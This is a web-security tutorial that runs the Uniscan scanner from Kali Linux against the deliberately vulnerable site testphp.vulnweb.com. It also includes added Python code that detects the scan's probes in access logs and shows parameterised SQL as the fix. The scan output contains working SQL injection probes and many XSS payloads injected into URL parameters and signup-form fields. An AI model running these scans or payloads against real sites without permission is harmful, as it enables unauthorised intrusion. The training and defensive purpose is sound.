How to Find Vulnerabilities in Websites: A Complete Guide with Tools and Techniques

Discovering vulnerabilities in websites is a fairly simple matter: with some technical knowledge of tools and techniques such as Uniscan and SQL injection, you will be able to look for vulnerabilities in websites.

With that in mind, I had the idea of writing this article to teach attack techniques that are widely used to find vulnerabilities in websites.

The techniques demonstrated here are based on web attacks, and the tests are applied mainly to vulnerabilities in PHP websites. We will run the tests against the site "Testphp.Vulnweb", where we have full permission to perform this kind of test, since it was created for exactly this purpose: to challenge, teach and motivate information security professionals to find flaws in their applications.

For this exploration, note that the Debian-based distribution "Kali Linux" is being used, together with two very important tools that come pre-installed on Kali by default.

Kali Linux with Uniscan and Sqlmap to find vulnerabilities in websites

  • Uniscan: A powerful web vulnerability scanner that looks for common flaws such as local file inclusion, remote command execution, remote file inclusion and SQL injection. It can also identify and enumerate web services, interesting files and directories, and server information.
  • SqlMap: An open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities. This well-known software is also commonly used by crackers to break into SQL databases.

Uniscan – Web Penetration Testing Tool

In the Kali terminal, type the command "uniscan --help", which prints the function of each option:

root@Kali2018-4:~# uniscan --help
####################################
# Uniscan project #
# http://uniscan.sourceforge.net/ #
####################################
V. 6.3
OPTIONS:
-h help
-u <url> example: https://www.example.com/
-f <file> list of url's
-b Uniscan go to background
-q Enable Directory checks
-w Enable File checks
-e Enable robots.txt and sitemap.xml check
-d Enable Dynamic checks
-s Enable Static checks
-r Enable Stress checks
-i <dork> Bing search
-o <dork> Google search
-g Web fingerprint
-j Server fingerprint
usage:
[1] perl ./uniscan.pl -u http://www.example.com/ -qweds
[2] perl ./uniscan.pl -f sites.txt -bqweds
[3] perl ./uniscan.pl -i uniscan
[4] perl ./uniscan.pl -i "ip:xxx.xxx.xxx.xxx"
[5] perl ./uniscan.pl -o "inurl:test"
[6] perl ./uniscan.pl -u https://www.example.com/ -r

How to Find Vulnerabilities in Websites with Uniscan

Next, type the command "uniscan -u http://testphp.vulnweb.com/ -qweds" so the tool runs a general vulnerability check on the application. As the help output above shows, -q enables the directory checks, -w the file checks, -e the robots.txt and sitemap.xml check, -d the dynamic checks and -s the static checks. This tool will help you learn how to discover vulnerabilities in websites.

root@Kali2018-4:~# uniscan -u http://testphp.vulnweb.com/ -qweds
####################################
# Uniscan project #
# http://uniscan.sourceforge.net/ #
####################################
V. 6.3
Scan date: 10-2-2020 20:45:18
===================================================================================================
| Domain: http://testphp.vulnweb.com/
| Server: nginx/1.4.1
| IP: 176.28.50.165
===================================================================================================
|
| Directory check:
| [+] CODE: 200 URL: http://testphp.vulnweb.com/Flash/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/admin/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/images/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/pictures/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/secured/
===================================================================================================
|
| File check:
| [+] CODE: 200 URL: http://testphp.vulnweb.com/CVS/Entries
| [+] CODE: 200 URL: http://testphp.vulnweb.com/favicon.ico
| [+] CODE: 200 URL: http://testphp.vulnweb.com/index.php
| [+] CODE: 200 URL: http://testphp.vulnweb.com/login.php
| [+] CODE: 200 URL: http://testphp.vulnweb.com/search.php
| [+] CODE: 200 URL: http://testphp.vulnweb.com/userinfo.php?uid=1;
===================================================================================================
|
| Check robots.txt:
|
| Check sitemap.xml:
===================================================================================================
|
| Crawler Started:
| Plugin name: E-mail Detection v.1.1 Loaded.
| Plugin name: Upload Form Detect v.1.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin name: External Host Detect v.1.2 Loaded.
| Plugin name: phpinfo() Disclosure v.1 Loaded.
| Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
| Plugin name: Code Disclosure v.1.1 Loaded.
| Plugin name: FCKeditor upload test v.1 Loaded.
| [+] Crawling finished, 87 URL's found!
|
| E-mails:
| [+] E-mail Found: wvs@acunetix.com
|
| File Upload Forms:
|
| Timthumb:
|
| External hosts:
| [+] External Host Found: http://www.eclectasy.com
| [+] External Host Found: http://www.acunetix.com
| [+] External Host Found: https://www.acunetix.com
| [+] External Host Found: http://blog.mindedsecurity.com
|
| PHPinfo() Disclosure:
|
| Web Backdoors:
|
| Source Code Disclosure:
| [+] Source Code Found: http://testphp.vulnweb.com/pictures/wp-config.bak
|
| FCKeditor File Upload:
|
| Ignored Files:
| http://testphp.vulnweb.com/Flash/add.fla
| http://testphp.vulnweb.com/admin/create.sql
===================================================================================================
| Dynamic tests:
| Plugin name: Learning New Directories v.1.2 Loaded.
| Plugin name: FCKedior tests v.1.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin name: Find Backup Files v.1.2 Loaded.
| Plugin name: Blind SQL-injection tests v.1.3 Loaded.
| Plugin name: Local File Include tests v.1.1 Loaded.
| Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
| Plugin name: Remote Command Execution tests v.1.1 Loaded.
| Plugin name: Remote File Include tests v.1.2 Loaded.
| Plugin name: SQL-injection tests v.1.2 Loaded.
| Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
| Plugin name: Web Shell Finder v.1.3 Loaded.
| [+] 4 New directories added
|
|
| FCKeditor tests:
| Timthumb < 1.33 vulnerability:
| Backup Files:
| Blind SQL Injection:
| Local File Include:
| PHP CGI Argument Injection:
| Remote Command Execution:
| Remote File Include:
| SQL Injection:
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=1'
[*] Remaining tests: 96
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=1"
[*] Remaining tests: 95
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=2'
[*] Remaining tests: 94
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=2"
[*] Remaining tests: 93
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=3'
[*] Remaining tests: 92
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=3"
[*] Remaining tests: 91
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=4'
[*] Remaining tests: 90
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=4"
[*] Remaining tests: 89
[*] Remaining tests: 88
[*] Remaining tests: 87
[*] Remaining tests: 86
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=1'
[*] Remaining tests: 85
[*] Remaining tests: 84
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=1"
[*] Remaining tests: 83
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=2"
[*] Remaining tests: 82
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=2'
[*] Remaining tests: 81
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=3'
[*] Remaining tests: 80
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=3"
| [+] Vul [SQL-i] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123'&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| Cross-Site Scripting (XSS):
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><script>alert('XSS')</script>
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><IMG SRC="javascript:alert('XSS');">
[*] Remaining tests: 283
[*] Remaining tests: 282
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
[*] Remaining tests: 281
[*] Remaining tests: 280
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
[*] Remaining tests: 279
[*] Remaining tests: 278
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><DIV STYLE="background-image: url(javascript:alert('XSS'))">
[*] Remaining tests: 277
[*] Remaining tests: 276
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><body onload="javascript:alert('XSS')"></body> 
[*] Remaining tests: 275
[*] Remaining tests: 274
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><table background="javascript:alert('XSS')"></table>
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<script>alert('XSS')</script>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 163
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<IMG SRC="javascript:alert('XSS');">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<body onload="javascript:alert('XSS')"></body>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<table background="javascript:alert('XSS')"></table>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<script>alert('XSS')</script>&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<IMG SRC="javascript:alert('XSS');">&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 136
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 135
[*] Remaining tests: 134
[*] Remaining tests: 133
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<body onload="javascript:alert('XSS')"></body>&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 132
[*] Remaining tests: 131
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<table background="javascript:alert('XSS')"></table>&uemail=123&uphone=123&signup=123&uaddress=123 
[*] Remaining tests: 130
[*] Remaining tests: 129
[*] Remaining tests: 128
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<script>alert('XSS')</script>&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 127
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<IMG SRC="javascript:alert('XSS');">&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 126
[*] Remaining tests: 125
[*] Remaining tests: 124
[*] Remaining tests: 123
[*] Remaining tests: 122
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 121
[*] Remaining tests: 119
[*] Remaining tests: 119
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&uphone=123&signup=123&uaddress=123
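As an added illustration, not part of the original article, the Python script below shows what a scan like this looks like from the defender's side: it parses nginx access-log lines constructed to mirror the probes above (query values ending in a lone quote for SQL injection, script and javascript: payloads for XSS) and flags the client IP that sent them. The log lines, IP addresses and the threshold are all constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed nginx combined-format access log (hypothetical IPs and times). The
# requests mirror the probes Uniscan sent in the scan above.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Feb/2020:20:45:20 +0000] "GET /admin/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2020:20:45:21 +0000] "GET /listproducts.php?cat=1' HTTP/1.1" 200 3112 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2020:20:45:21 +0000] "GET /listproducts.php?cat=1%22 HTTP/1.1" 200 3112 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2020:20:45:22 +0000] "GET /hpp/?pp=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1" 200 720 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2020:20:45:22 +0000] "GET /hpp/?pp=%22%3E%3CIMG%20SRC=%22javascript:alert('XSS')%3B%22%3E HTTP/1.1" 200 720 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Feb/2020:20:46:01 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 3112 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
XSS_RE = re.compile(r'<\s*script|javascript\s*:|\bon\w+\s*=', re.IGNORECASE)

def parse_line(line):
    """Split one access-log line into ip, method, target (path + query) and status."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def classify(target):
    """Return 'sqli-probe', 'xss-probe' or None for one request target."""
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)            # decode any second layer of %-encoding
        if XSS_RE.search(value):
            return "xss-probe"
        if value.endswith(("'", '"')):    # lone trailing quote: error-based SQLi probe
            return "sqli-probe"
    return None

def summarize(log_text, min_probes=3):
    """Count probes per client IP; flag an IP once it reaches min_probes."""
    per_ip = defaultdict(lambda: {"requests": 0, "sqli-probe": 0, "xss-probe": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stats = per_ip[rec["ip"]]
        stats["requests"] += 1
        kind = classify(rec["target"])
        if kind:
            stats[kind] += 1
    return {ip: {**s, "flagged": s["sqli-probe"] + s["xss-probe"] >= min_probes}
            for ip, s in per_ip.items()}
```

The same classifier run over a real log would also surface the directory and file checks from the first part of the scan as a burst of requests to many distinct paths from one client in a few seconds.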

Frequently Asked Questions about Website Vulnerabilities

What are website vulnerabilities?
Website vulnerabilities are flaws or gaps in the programming, configuration or design of a web application that attackers can exploit to gain unauthorized access, steal data or compromise the security of the system. This includes problems such as SQL Injection and Cross-Site Scripting (XSS).
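As an added example that is not from the article, the Python/sqlite3 snippet below shows the root cause behind the SQL injection the scan reported on listproducts.php?cat=1': a handler that concatenates the cat parameter into the query breaks with a database error on a single quote, while a handler that validates the expected type and binds a parameter does not. The table and its rows are a constructed stand-in for the real site's backend.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the products table behind listproducts.php."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, 1, "Poster A"), (2, 1, "Poster B"), (3, 2, "Frame")])
    return conn

def list_products_unsafe(conn, cat):
    """The flaw the scanner probes for: the raw cat parameter concatenated into SQL.
    A trailing quote breaks the statement, and the resulting database error is
    exactly what an error-based probe such as cat=1' is looking for."""
    query = "SELECT name FROM products WHERE cat=" + cat
    return [row[0] for row in conn.execute(query)]

def list_products_safe(conn, cat):
    """Hardened form: enforce the type the page expects, then bind it as a
    parameter so the value is never parsed as part of the SQL statement."""
    if not cat.isdigit():
        raise ValueError("cat must be a positive integer")
    rows = conn.execute("SELECT name FROM products WHERE cat=?", (int(cat),))
    return [row[0] for row in rows]

def probe(handler, cat):
    """What one request observes: the product list, or the name of the error raised."""
    try:
        return handler(make_db(), cat)
    except (sqlite3.Error, ValueError) as exc:
        return type(exc).__name__
```

In a real handler the ValueError becomes a plain 400 response, and database errors must never be echoed to the client, because that error text is what the scanner's quote probes rely on.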
Which tools can I use to find vulnerabilities?
For beginners, tools such as Uniscan and Sqlmap (covered in this article) are excellent starting points, especially if you use a distribution like Kali Linux. There are also other solutions, such as OWASP ZAP and Burp Suite, that offer more advanced features for penetration testing.
Is it legal to look for vulnerabilities in websites?
It is legal, and encouraged, to look for vulnerabilities in websites if you have explicit permission from the site owner. Many bug bounty programs and platforms such as "Hacker One" allow security researchers to test systems for flaws. Always check a site's vulnerability disclosure policy (VDP) before performing any test.